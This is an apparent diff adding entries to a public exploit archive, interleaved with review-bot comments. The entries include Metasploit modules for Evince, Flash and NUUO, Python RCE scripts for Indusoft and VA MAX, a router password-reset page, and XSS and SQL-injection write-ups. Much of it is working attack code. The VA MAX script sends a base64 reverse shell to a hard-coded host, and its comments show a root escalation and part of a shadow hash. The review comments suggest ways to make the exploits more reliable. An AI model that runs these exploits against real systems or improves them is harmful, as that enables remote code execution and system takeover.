+XSS128 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/ovpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+KEEPALIVE_1
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS129 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/ovpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+KEEPALIVE_2
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS130 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/ddns.cgi
+
+METHOD
+Post
+
+PARAMETER
+ID
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS131 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/ddns.cgi
+
+METHOD
+Post
+
+PARAMETER
+HOSTNAME
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS132 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/ddns.cgi
+
+METHOD
+Post
+
+PARAMETER
+LOGIN
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS133 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/ddns.cgi
+
+METHOD
+Post
+
+PARAMETER
+PASSWORD
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS134 | Stored
+
+URL
+https://192.168.2.200:444/cgi-bin/time.cgi
+
+METHOD
+Post
+
+PARAMETER
+NTP_ADDR_1
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS135 | Stored
+
+URL
+https://192.168.2.200:444/cgi-bin/time.cgi
+
+METHOD
+Post
+
+PARAMETER
+NTP_ADDR_2
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS136 | Stored
+
+URL
+https://192.168.2.200:444/cgi-bin/time.cgi
+
+METHOD
+Post
+
+PARAMETER
+UPDATE_VALUE
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS137 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/ids.cgi
+
+METHOD
+Post
+
+PARAMETER
+OINKCODE
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS138 | Stored
+
+URL
+https://192.168.2.200:444/cgi-bin/extrahd.cgi
+
+METHOD
+Post
+
+PARAMETER
+FS
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS139 | Stored
+
+URL
+https://192.168.2.200:444/cgi-bin/extrahd.cgi
+
+METHOD
+Post
+
+PARAMETER
+PATH
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS140 | Stored
+
+URL
+https://192.168.2.200:444/cgi-bin/extrahd.cgi
+
+METHOD
+Post
+
+PARAMETER
+UUID
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS141 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/firewall.cgi
+
+METHOD
+Post
+
+PARAMETER
+src_addr
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS142 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/firewall.cgi
+
+METHOD
+Post
+
+PARAMETER
+tgt_addr
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS143 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/firewall.cgi
+
+METHOD
+Post
+
+PARAMETER
+SRC_PORT
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS144 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/firewall.cgi
+
+METHOD
+Post
+
+PARAMETER
+TGT_PORT
+
+PAYLOAD
+'">
+
+#################################################################################
+
+XSS145 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/firewall.cgi
+
+METHOD
+Post
+
+PARAMETER
+ruleremark
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS146 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/fwhosts.cgi
+
+METHOD
+Post + +PARAMETER +HOSTNAME + +PAYLOAD +'> + +################################################################################# + +XSS147 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/fwhosts.cgi + +METHOD +Post + +PARAMETER +IP + +PAYLOAD +'> + +################################################################################# + +XSS148 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/fwhosts.cgi + +METHOD +Post + +PARAMETER +SUBNET + +PAYLOAD +'> + +################################################################################# + +XSS149 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/fwhosts.cgi + +METHOD +Post + +PARAMETER +NETREMARK + +PAYLOAD +'> + +################################################################################# + +XSS150 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/fwhosts.cgi + +METHOD +Post + +PARAMETER +HOSTREMARK + +PAYLOAD +'> + +################################################################################# + +XSS151 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/fwhosts.cgi + +METHOD +Post + +PARAMETER +newhost + +PAYLOAD +'> + +################################################################################# + +XSS152 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/fwhosts.cgi + +METHOD +Post + +PARAMETER +grp_name + +PAYLOAD +'> + +################################################################################# + +XSS153 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/fwhosts.cgi + +METHOD +Post + +PARAMETER +remark + +PAYLOAD +'> + +################################################################################# + +XSS154 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/fwhosts.cgi + +METHOD +Post + +PARAMETER +SRV_NAME + +PAYLOAD +'> + +################################################################################# + +XSS155 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/fwhosts.cgi + +METHOD +Post + +PARAMETER +SRV_PORT + +PAYLOAD +'> + 
+################################################################################# + +XSS156 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/fwhosts.cgi + +METHOD +Post + +PARAMETER +SRVGRP_NAME + +PAYLOAD +'> + +################################################################################# + +XSS157 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/fwhosts.cgi + +METHOD +Post + +PARAMETER +SRVGRP_REMARK + +PAYLOAD +'> + +################################################################################# + +XSS158 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/fwhosts.cgi + +METHOD +Post + +PARAMETER +updatesrvgrp + +PAYLOAD +'> + +################################################################################# + +XSS159 | Stored + +URL +https://192.168.2.200:444/cgi-bin/logs.cgi/config.dat + +METHOD +Post + +PARAMETER +ENABLE_REMOTELOG + +PAYLOAD +'> + +################################################################################# + +XSS160 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/logs.cgi/proxylog.dat + +METHOD +Post + +PARAMETER +FILTER + +PAYLOAD +'> + +################################################################################# + +XSS161 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/logs.cgi/firewalllogip.dat + +METHOD +Post + +PARAMETER +pienumber + +PAYLOAD +'> + +################################################################################# + +XSS162 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/logs.cgi/firewalllogport.dat + +METHOD +Post + +PARAMETER +pienumber + +PAYLOAD +'> + +################################################################################# + +XSS163 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/logs.cgi/firewalllogcountry.dat + +METHOD +Post + +PARAMETER +pienumber + +PAYLOAD +'> + +################################################################################# + +XSS164 | Reflected + +URL +https://192.168.2.200:444/cgi-bin/logs.cgi/log.dat + +METHOD +Post + 
+PARAMETER +SECTION + +PAYLOAD +'> + +################################################################################# \ No newline at end of file diff --git a/exploits/hardware/webapps/46336.html b/exploits/hardware/webapps/46336.html new file mode 100644 index 000000000..7fed192a5 --- /dev/null +++ b/exploits/hardware/webapps/46336.html @@ -0,0 +1,35 @@ +# Exploit Title: Coship Wireless Router – Wireless SSID Unauthenticated Password Reset +# Date: 07.02.2019 +# Exploit Author: Adithyan AK +# Vendor Homepage: http://en.coship.com/ +# Category: Hardware (WiFi Router) +# Affected Versions *: *Coship RT3052 - 4.0.0.48, Coship RT3050 - 4.0.0.40, Coship WM3300 - 5.0.0.54, Coship WM3300 - 5.0.0.55, Coship RT7620 - 10.0.0.49. +# Tested on: MacOS Mojave v.10.14 +# CVE: CVE-2019-7564 + +#POC : + +# Change the X.X.X.X in poc to Router Gateway address and save the below code as Exploit.html +# Open Exploit.html with your Browser +# Click on “Submit request” +# The password of the Wireless SSID will be changed to "password" + + + + +
+ + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/linux/local/46341.rb b/exploits/linux/local/46341.rb new file mode 100755 index 000000000..2220dd501 --- /dev/null +++ b/exploits/linux/local/46341.rb 
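Review bot: The form that performs the reset is not visible in this rendering of 46336.html — the steps say the SSID password becomes "password", but the endpoint, HTTP method and parameter names cannot be read from the entry, so the header comments should state them (e.g. `# Request: POST http://<gateway>/<path>  <param>=password`) so the finding can be verified without opening the HTML. Because the PoC is a page opened in a browser on the LAN, it is in effect a cross-site request against the gateway, and the write-up should say whether the endpoint checks a session cookie, Origin or Referer — "Unauthenticated" implies it checks none of them, which is the actual bug. The affected-versions line also carries a stray `*: *`; tidy it to `# Affected Versions: Coship RT3052 4.0.0.48, RT3050 4.0.0.40, ...`.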
@@ -0,0 +1,108 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'rex/zip' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::FILEFORMAT + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Evince CBT File Command Injection', + 'Description' => %q{ + This module exploits a command injection vulnerability in Evince + before version 3.24.1 when opening comic book `.cbt` files. + + Some file manager software, such as Nautilus and Atril, may allow + automatic exploitation without user interaction due to thumbnailer + preview functionality. + + Note that limited space is available for the payload (<256 bytes). + Reverse Bash and Reverse Netcat payloads should be sufficiently small. + + This module has been tested successfully on evince versions: + + 3.4.0-3.1 + nautilus 3.4.2-1+build1 on Kali 1.0.6; + 3.18.2-1ubuntu4.3 + atril 1.12.2-1ubuntu0.3 on Ubuntu 16.04. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Felix Wilhelm', # Discovery + 'Sebastian Krahmer', # PoC + 'Matlink', # Exploit + 'bcoles' # Metasploit + ], + 'References' => + [ + ['BID', '99597'], + ['CVE', '2017-1000083'], + ['EDB', '45824'], + ['URL', 'https://seclists.org/oss-sec/2017/q3/128'], + ['URL', 'https://bugzilla.gnome.org/show_bug.cgi?id=784630'], + ['URL', 'https://bugzilla.suse.com/show_bug.cgi?id=1046856'], + ['URL', 'https://bugs.launchpad.net/ubuntu/+source/atril/+bug/1735418'], + ['URL', 'https://bugs.launchpad.net/ubuntu/+source/atril/+bug/1800662'], + ['URL', 'https://access.redhat.com/security/cve/cve-2017-1000083'], + ['URL', 'https://security-tracker.debian.org/tracker/CVE-2017-1000083'] + ], + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'Space' => 215, + 'BadChars' => "\x00\x0a\x0d\x22", + 'DisableNops' => true + }, + 'DefaultOptions' => + { + 'PAYLOAD' => 'cmd/unix/reverse_bash', + 'DisablePayloadHandler' => true + }, + 'Targets' => [[ 'Automatic', {}]], + 'Privileged' => false, + 'DisclosureDate' => '2017-07-13', + 'DefaultTarget' => 0)) + register_options([ + OptString.new('FILENAME', [true, 'The cbt document file name', 'msf.cbt']) + ]) + end + + def exploit + ext = %w[png jpg gif] + path = " --checkpoint-action=exec=bash -c \"#{payload.encoded};\".#{ext.sample}" + + # Tar archive max path length is 256. + if path.length > 256 + fail_with Failure::PayloadFailed, "Payload is too large (#{path.length}): Max path length is 256 characters" + end + + # Tar archive max file name length is 100. 
+ path.split('/').each do |fname| + if fname.length > 100 + fail_with Failure::PayloadFailed, "File name too long (#{fname.length}): Max filename length is 100 characters" + end + end + + # Create malicious tar archive + tarfile = StringIO.new + Rex::Tar::Writer.new tarfile do |tar| + tar.add_file path, 0644 do |io| + io.write '' + end + # Pad file to 1+ MB to trigger tar checkpoint action + tar.add_file rand_text_alphanumeric(10..20), 0644 do |io| + io.write rand_text(1_000_000..1_100_000) + end + end + tarfile.rewind + cbt = tarfile.read + + print_status "Writing file: #{datastore['FILENAME']} (#{cbt.length} bytes) ..." + file_create cbt + end +end \ No newline at end of file diff --git a/exploits/linux/webapps/46349.txt b/exploits/linux/webapps/46349.txt new file mode 100644 index 000000000..3611804b5 --- /dev/null +++ b/exploits/linux/webapps/46349.txt @@ -0,0 +1,20 @@ +# Exploit Title: CentOS Web Panel 0.9.8.763 - Stored Cross-Site Scripting Vulnerability +# Google Dork: N/A +# Date: 10 - January - 2019 +# Exploit Author: DKM +# Vendor Homepage: http://centos-webpanel.com +# Software Link: http://centos-webpanel.com +# Version: v0.9.8.763 +# Tested on: CentOS 7 +# CVE : CVE-2019-7646 + +# Description: +A Stored Cross Site Scripting vulnerability is found in the "Package Name" Field within the 'Add a Package (add_package)' module. This is because the application does not properly sanitize the users input. + + +# Steps to Reproduce: +1. Login into the CentOS Web Panel using admin credential. +2. From Navigation Click on "Packages" -> then Click on "Add a Package" +3. In "Package Name" field give payload as: and provide other details and click on "Create" +4. Now again from Navigation Click on "Packages" -> then Click on "List Packages" +5. Now one can see that the XSS Payload executed. \ No newline at end of file 
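Review bot: The `BadChars` list in the payload metadata excludes only `"`, yet `path` embeds `payload.encoded` inside double quotes in `bash -c \"…\"`, which tar's checkpoint exec action presumably hands to `/bin/sh -c`, so a payload containing `$`, a backtick or a backslash is expanded or mangled by that shell before bash sees it; the default `cmd/unix/reverse_bash` happens to avoid them, but a user-supplied `cmd/unix/generic` CMD would not. Extend the list to `'BadChars' => "\x00\x0a\x0d\x22\x24\x5c\x60",` and say in the description that the payload runs inside a double-quoted `bash -c` string. Separately, the 100-byte per-component check only differs from the 256-byte path check when the payload itself contains a `/`, so a comment should say that the ustar name/prefix split at a `/` is what lets such a path fit at all — assuming Rex::Tar::Writer emits plain ustar headers rather than GNU long names, which is not visible here.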
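Review bot: The payload in step 3 of the reproduction is missing — the text reads `give payload as: and provide other details`, so the entry cannot be reproduced as written; restore the script string escaped so it survives rendering, or describe it, e.g. `3. In "Package Name" give a payload such as <script>alert(1)</script>`. A sentence on impact is also needed: the steps require logging in with admin credentials, so unless lower-privileged users can create packages the stored script only fires for other administrators viewing "List Packages", which narrows the severity considerably.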
diff --git a/exploits/multiple/remote/46048.py b/exploits/multiple/dos/46048.py similarity index 100% rename from exploits/multiple/remote/46048.py rename to exploits/multiple/dos/46048.py diff --git a/exploits/multiple/remote/46342.py b/exploits/multiple/remote/46342.py new file mode 100755 index 000000000..430209c3c --- /dev/null +++ b/exploits/multiple/remote/46342.py 
@@ -0,0 +1,136 @@ +## +# Exploit Title: Indusoft Web Studio Unauthenticated RCE +# Date: 02/04/2019 +# Exploit Author: Jacob Baines +# Vendor Homepage: http://www.indusoft.com/ +# Software http://www.indusoft.com/Products-Downloads/Download-Library +# Version: 8.1 SP2 and below +# Tested on: Windows 7 running the Web Studio 8.1 SP2 demo app +# CVE : CVE-2019-6545 CVE-2019-6543 +# Advisory: +https://sw.aveva.com/hubfs/assets-2018/pdf/security-bulletin/SecurityBulletin_LFSec133.pdf?hsLang=en +# Advisory: https://ics-cert.us-cert.gov/advisories/ICSA-19-036-01 +# Advisory: https://www.tenable.com/security/research/tra-2019-04 +## +import argparse +import threading +import socket +from struct import * +import time +import sys + +from impacket import smbserver + +## +# The SMB Server function. Runs on its own thread. +# @param lip the listening IP address +## +def smb_server(lip): + server = smbserver.SimpleSMBServer(listenAddress=lip, listenPort=445) + server.addShare('LOLWAT', '.', '') + server.setSMBChallenge('') + server.setLogFile('/dev/null') + server.start() + +## +# Converts a normal string to a utf 16 with a length field. +# @param s the string to convert +## +def wstr(s): + slen = len(s) + s = s.encode('utf_16_le') + + out = '\xff\xfe\xff' + if slen < 0xff: + out += pack('\n" + "\n" + "\t{WinExec(\"calc.exe\")}\n" + "\t\n" + "\t2\n" + "\t5\n" + "\t127.0.0.1\n" + "\t3997" + "\t0\n" + "\t120\n" + "\n") + xdc.close() + + print "[+] Sending the connection init message" + init_conn = "\x02\x31\x10\x31\x10\x38\x10\x31\x10\x31\x03" + sock.sendall(init_conn) + resp = sock.recv(1024) + print '<- ' + resp + + # do a basic validation of the response + if (len(resp) > 0 and resp[len(resp) - 1] == '\x03'): + print "[+] Received an init response" + else: + print "[-] Invalid init response. Exiting..." 
+ sock.close() + sys.exit(0) + + # Craft command 66 + cmd = wstr('CO') # options: EX, CO, CF, CC + cmd += wstr('\\\\' + args.lip + '\\LOLWAT\\DB') # file to load + cmd += wstr('') + cmd += wstr('') + cmd += wstr('') + cmd += wstr('lolwat') + cmd += pack(' 'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion', + 'Description' => %q( + This module exploits a type confusion on Adobe Flash Player, which was + originally found being successfully exploited in the wild. This module + has been tested successfully on: + macOS Sierra 10.12.3, + Safari and Adobe Flash Player 21.0.0.182, + Firefox and Adobe Flash Player 21.0.0.182. + ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Genwei Jiang', # FireEye original blog details on the vulnerability + 'bcook-r7' # Imported Metasploit module + ], + 'References' => + [ + ['CVE', '2016-4117'], + ['BID', '90505'], + ['URL', 'https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html'], + ['URL', 'http://www.securitytracker.com/id/1035826'], + ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa16-02.html'], + ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb16-15.html'], + ], + 'Payload' => + { + 'DisableNops' => true + }, + 'Platform' => ['osx'], + 'BrowserRequirements' => + { + source: /script|headers/i, + os_name: lambda do |os| + os =~ OperatingSystems::Match::MAC_OSX + end, + ua_name: lambda do |ua| + case target.name + when 'Mac OS X' + return true if ua == Msf::HttpClients::SAFARI + return true if ua == Msf::HttpClients::FF + end + + false + end, + flash: lambda do |ver| + case target.name + when 'Mac OS X' + return true if Gem::Version.new(ver) <= Gem::Version.new('21.0.0.182') + end + + false + end + }, + 'Targets' => + [ + [ + 'Mac OS X', { + 'Platform' => 'osx', + 'Arch' => ARCH_X64 + } + ] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Apr 27 2016', + 'DefaultTarget' => 0)) + end + + def exploit + @swf = create_swf + + super + end + + def 
on_request_exploit(cli, request, target_info) + print_status("Request: #{request.uri}") + + if request.uri.end_with? 'swf' + print_status('Sending SWF...') + send_response(cli, @swf, 'Content-Type' => 'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache') + return + end + + print_status('Sending HTML...') + send_exploit_html(cli, exploit_template(cli, target_info), 'Pragma' => 'no-cache') + end + + def exploit_template(cli, target_info) + swf_random = "#{rand_text_alpha(3..7)}.swf" + target_payload = get_payload(cli, target_info) + b64_payload = Rex::Text.encode_base64(target_payload) + + if target.name.include? 'osx' + platform_id = 'osx' + end + html_template = %( + + + + + + + + + + + ) + + return html_template, binding + end + + def create_swf + path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-4117', 'msf.swf') + File.binread(path) + end +end \ No newline at end of file diff --git a/exploits/php/remote/46340.rb b/exploits/php/remote/46340.rb new file mode 100755 index 000000000..8b4207a4f --- /dev/null +++ b/exploits/php/remote/46340.rb 
@@ -0,0 +1,87 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => 'NUUO NVRmini upgrade_handle.php Remote Command Execution', + 'Description' => %q{ + This exploits a vulnerability in the web application of NUUO NVRmini IP camera, + which can be done by triggering the writeuploaddir command in the upgrade_handle.php file. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Berk Dusunur', # @berkdusunur + 'numan turle' # @numanturle + ], + 'References' => + [ + ['URL', 'https://www.berkdusunur.net/2018/11/development-of-metasploit-module-after.html'], + ['URL', 'https://www.tenable.com/security/research/tra-2018-41'], + ['CVE', '2018-14933'], + ['EDB', '45070'] + ], + 'Privileged' => false, + 'Payload' => + { + 'DisableNops' => true + }, + 'Platform' => %w{ unix win linux }, + 'Arch' => ARCH_CMD, + 'Targets' => [ ['NUUO NVRmini', { }], ], + 'DisclosureDate' => 'Aug 04 2018', + 'DefaultTarget' => 0)) + end + + def check + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'upgrade_handle.php'), + 'vars_get' => + { + 'cmd' => 'writeuploaddir', + 'uploaddir' => "';echo '#{Rex::Text.rand_text_alphanumeric(10..15)}';'" + }} + ) + + unless res + vprint_error 'Connection failed' + return CheckCode::Unknown + end + + if res.code == 200 && res.body =~ /upload_tmp_dir/ + return CheckCode::Vulnerable + end + + CheckCode::Safe + end + + def http_send_command(cmd) + uri = normalize_uri(target_uri.path.to_s, "upgrade_handle.php") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => uri, + 'vars_get' => + { + 'cmd' => 'writeuploaddir', + 'uploaddir' => "';"+cmd+";'" + }} + ) + + unless res + fail_with(Failure::Unknown, 'Failed to execute the command.') + end + + res + end + + def 
exploit + http_send_command(payload.encoded) + end +end \ No newline at end of file diff --git a/exploits/php/webapps/46347.txt b/exploits/php/webapps/46347.txt new file mode 100644 index 000000000..db7eeeb17 --- /dev/null +++ b/exploits/php/webapps/46347.txt @@ -0,0 +1,23 @@ +# Exploit Title: MyBB Bans List - Cross Site Scripting +# Date: 7/25/2018 +# Author: 0xB9 +# Twitter: @0xB9Sec +# Contact: 0xB9[at]pm.me +# Software Link: https://community.mybb.com/mods.php?action=view&pid=423 +# Version: 1.0 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2018-14724 + + +1. Description: +Adds bans.php page, showing a list of banned users and the reason of ban. + +Any forum user that's a mod can ban users and input a payload into the ban reason which gets executed on the bans.php page. + + +2. Proof of Concept: + +- Have a mod account +- Ban a user +- Input the following for reason of the ban +- Anyone to view page will execute payload \ No newline at end of file diff --git a/exploits/php/webapps/46348.py b/exploits/php/webapps/46348.py new file mode 100755 index 000000000..e1877ea4c --- /dev/null +++ b/exploits/php/webapps/46348.py 
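Review bot: `check` sends an `echo` of a random string but never looks for that string in the response; it returns `Vulnerable` on any 200 whose body contains `upload_tmp_dir`, which a fixed device that merely prints its upload directory would also satisfy. Keep the token and test for it: `token = Rex::Text.rand_text_alphanumeric(10..15)`, `'uploaddir' => "';echo '#{token}';'"`, then `return CheckCode::Vulnerable if res.code == 200 && res.body.include?(token)`, falling back to `CheckCode::Detected` when only `upload_tmp_dir` matches. The payload is also spliced between single quotes in `"';"+cmd+";'"`, but no `'BadChars' => "'"` is declared, so a payload containing a single quote breaks out of the injection and fails. Finally, `http_send_command` calls `fail_with` when `res` is nil, yet a blocking reverse-shell payload can hold the request open until the client times out, which would report a failure after the session was already established; a nil response there is better logged with `vprint_warning` than treated as fatal.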
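Review bot: The ban-reason payload in the proof of concept is missing — the line reads `Input the following for reason of the ban` followed by nothing, so the entry is not reproducible from this text; add the string escaped so it survives rendering, or a description such as `- Input a script tag, e.g. <script>alert(1)</script>, as the ban reason`. The title should also make clear that the affected component is the third-party "Bans List" plugin 1.0 for MyBB rather than MyBB core, since the header gives only the plugin's mod page and version. The exploit requires moderator rights, so the write-up should state that the victims are every viewer of bans.php, which is what turns a moderator-level write into a site-wide stored XSS.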
@@ -0,0 +1,99 @@ +root@nippur:/home/c/src/nippur# cat vamax3.py +#!/usr/bin/env python +# quick poc for postauth rce bug in va max 8.3.4 +# +# more: +# https://code610.blogspot.com +# +# 10.02.2019 +# + +# p.s. +# +# listening on [any] 4444 ... +# 192.168.1.126: inverse host lookup failed: Unknown host +# connect to [192.168.1.160] from (UNKNOWN) [192.168.1.126] 58894 +# sh: no job control in this shell +# sh-4.1$ id +# id +# uid=48(apache) gid=48(apache) groups=48(apache),10(wheel),18(dialout) +# sh-4.1$ cat /etc/shadow +# cat /etc/shadow +# cat: /etc/shadow: Permission denied +# sh-4.1$ +# (...) +# sh-4.1$ sudo -l +# sudo -l +# Matching Defaults entries for apache on this host: +# syslog_goodpri=debug, env_reset, +# secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin +# +# User apache may run the following commands on this host: +# (ALL) NOPASSWD: ALL +# sh-4.1$ sudo su +# sudo su +# id +# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) +# head -n1 /etc/shadow +# root:$6$dNu030j/gSf.5(...)4IlAEGpzHv0:15392:0:99999:7::: +# +# +# o/ + +import datetime, time +import requests +from requests.auth import HTTPBasicAuth + +# defines +dateTime = datetime.datetime.now() +timestamp = int(time.mktime(dateTime.timetuple())) + +remote_host = 'http://192.168.1.126:9080' +our_user = 'loadbalancer' +our_passwd = 'loadbalancer' + +# go +sess = requests.session() +logme = sess.post(remote_host, auth=HTTPBasicAuth(our_user, our_passwd)) +logmeresp = logme.text + + +print '\n\tsmall poc for VA MAX 8.3.4\n' + + + +# try to log in +if 'Load Balancer Administration System' in logmeresp: + print '[+] using credentials: %s : %s' % ( our_user, our_passwd ) + print '[+] our timestamp: %s' % ( timestamp ) + + print '[+] proceed.' 
+ + getme = remote_host + '/lbadmin/config/changeip.php?action=modip&l=e&t=' + str(timestamp) + dogetme = sess.get(getme, auth=HTTPBasicAuth(our_user, our_passwd)) + getmeresp = dogetme.text + + + payload = "h4x;echo cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9J TkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC4xLjE2MCIsNDQ0NCkpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3 MuZHVwMihzLmZpbGVubygpLDEpOyBvcy5kdXAyKHMuZmlsZW5vKCksMik7cD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk7Jwo= | base64 -d | sh;#" + + #payload = "h4x;telnet 192.168.1.160 4444;#" + #payload = ';id>/tmp/id.id.id' + # print '[i] using payload:', payload + + data_req = { + 'eth0' : '192.168.1.126/24', + 'mtu_eth0' : '1500' + payload, # >.< + 'eth1' : '', + 'mtu_eth1' : '1500', + 'eth2' : '', + 'mtu_eth2' : '1500', + 'eth3' : '', + 'mtu_eth3' : '1500', + 'go' : 'Configure+Interfaces' + } + shLink = remote_host + '/lbadmin/config/changeip.php?action=modip&l=e&t=' + str(timestamp) + shellWe = sess.post(shLink, data=data_req, auth=HTTPBasicAuth(our_user, our_passwd)) + shResp = shellWe.text + + # check sudo -l now :> + print '\n\nThanks.Bye.\n' \ No newline at end of file diff --git a/exploits/php/webapps/46350.txt b/exploits/php/webapps/46350.txt new file mode 100644 index 000000000..18669af65 --- /dev/null +++ b/exploits/php/webapps/46350.txt 
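Review bot: The first line of 46348.py is a shell prompt, `root@nippur:/home/c/src/nippur# cat vamax3.py`, pasted above the shebang; it is not valid Python, so the file as committed fails to parse, and the `#!/usr/bin/env python` on the second line is inert — delete that line so the shebang is line 1. The base64 in `payload` appears with spaces inside it (`...BRl9J TkVU...`); if those spaces are in the file rather than an artifact of wrapping here, `base64 -d` rejects the input and the command after `| sh` never runs, so the blob should be one contiguous token. The call-back address `192.168.1.160:4444` and the credentials `loadbalancer:loadbalancer` are hard-coded; a short header comment that these must be edited, and that the `sudo -l` output in the comments (apache with `NOPASSWD: ALL`) is what turns this post-auth RCE into root, would make the PoC usable without decoding the payload.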
@@ -0,0 +1,46 @@ +=========================================================================================== +# Exploit Title: Webiness Inventory 2.3 - 'email' SQL Vulnerability +# Dork: N/A +# Date: 10-02-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: https://sourceforge.net/projects/webinessinventory/files/ +# Software Link: hhttps://sourceforge.net/projects/webinessinventory/files/ +# Version: 2.3 +# Category: Webapps +# Tested on: Wamp64, Windows +# CVE: N/A +# Software Description: Small stock inventory managment application for web. +=========================================================================================== +# POC - SQL +# Parameters : email +# Attack Pattern : +-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27 + +# POST Request: +http://localhost/webiness/index.php?request=Wsauth/login/[SQL] +# https://i.hizliresim.com/ADObQ7.jpg +========================================================================= +POST /webiness/index.php?request=Wsauth/login/ HTTP/1.1 +Host: localhost +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: en-us,en;q=0.5 +Cache-Control: no-cache +Content-Length: 458 +Content-Type: multipart/form-data; boundary=54a535315dda429db2f07895827ff1c6 +Cookie: PHPSESSID=6e5836p7djilmbh3bunro0ohu0 +Referer: http://localhost/webiness/ +User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, +like Gecko) Chrome/54.0.2840.99 Safari/537.36 + +--54a535315dda429db2f07895827ff1c6 +Content-Disposition: form-data; name="email" + +-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT 
